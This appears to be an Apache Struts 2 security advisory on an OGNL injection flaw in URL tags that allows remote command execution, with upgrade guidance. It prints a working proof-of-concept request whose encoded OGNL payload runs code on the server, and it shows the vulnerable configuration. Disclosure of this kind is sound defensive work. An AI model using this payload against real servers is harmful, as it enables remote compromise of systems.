...
Who should read this | All Struts 2 developers |
---|---|
Impact of vulnerability | Remote command execution |
Maximum security rating | High Critical |
Recommendation | Developers should immediately upgrade to Struts 2.3.14.1 |
Affected Software | Struts 2.0.0 - Struts 2.3.14 |
Problem
OGNL provides, among other features, extensive expression evaluation capabilities.
A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an URL Tag , which will cause a further evaluation.
...
- Open HelloWorld.jsp present in the Struts Blank App and add to one of the url tag the following parameter:
Such that the line will be something look like this:Code Block includeParams="all"
(I'm pretty sure it works also with includeParams="get" as well).Code Block xml xml <s:url id="url" action="HelloWorld" includeParams="all">
- Run struts2-blank app
- Open the url: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
(this is the shortenerize shortened version http://goo.gl/lhlTl)
The issue, in order to work, need a redirect result defined as the following:
Code Block |
---|
<action name="save" class="org.apache.struts2.showcase.action.SkillAction" method="save">
<result type="redirect">edit.action?skillName=${currentSkill.name}</result>
</action>
|
Solution
...
In this case, there is no way to escape the fakeParam, since it's not an expected parameter.
Solution
The OGNLUtil class was changed to deny eval expressions by default.
Note | |||||||
---|---|---|---|---|---|---|---|
| |||||||
In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (use it at your own risk).
Please, ensure that:
|
Warning |
---|
It is strongly recommended to upgrade to Struts 2.3.14.1, which contains the corrected OGNL and XWork library. |